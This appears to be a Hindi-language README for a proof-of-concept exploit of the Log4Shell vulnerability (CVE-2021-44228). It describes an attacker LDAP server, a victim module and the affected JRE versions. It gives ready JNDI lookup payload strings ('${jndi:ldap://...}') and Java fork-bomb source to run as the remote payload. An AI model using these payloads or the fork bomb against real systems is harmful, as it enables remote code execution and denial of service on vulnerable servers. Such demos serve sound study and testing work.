
💣💥💀 Proof of Concept: दूरस्थ सर्वर पर CVE-2021-44228 भेद्यता के कारण fork-बम चलाने का उदाहरण
💣💥💀 Proof of Concept: CVE-2021-44228 भेद्यता के कारण दूरस्थ सर्वर पर fork-bomb चलाने का उदाहरण
आक्रमणकारी का LDAP सर्वर बनाएं (server मॉड्यूल), जो स्ट्रिंग और कोड प्रस्तुतियाँ (payload मॉड्यूल) प्रदान करेगा
एक पीड़ित उदाहरण बनाएं (victim मॉड्यूल) और Log4j को एक स्ट्रिंग पास करें JRE संस्करण <= 6u211, 7u201, 8u191 और 11.0.1
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
पीड़ित एप्लिकेशन आक्रमणकारी सर्वर से बाइट्स की एक सरणी प्राप्त करेगा और उन्हें एक प्रतिस्थापित स्ट्रिंग या निष्पादन योग्य कोड में व्याख्या करेगा (पैरामीटर com.sun.jndi.ldap.object.trustURLCodebase = true)
उदाहरण के लिए, निष्पादन योग्य कोड एक fork-bomb होगा (एक प्रोग्राम जो अपनी प्रतियाँ चलाकर सभी CPU समय को भर देता है)
public class ForkBomb {
public static void main(String... args) {
Runtime.getRuntime().exec(new String[] {
"javaw",
"-cp",
System.getProperty("java.class.path"),
"ForkBomb"
});
}
}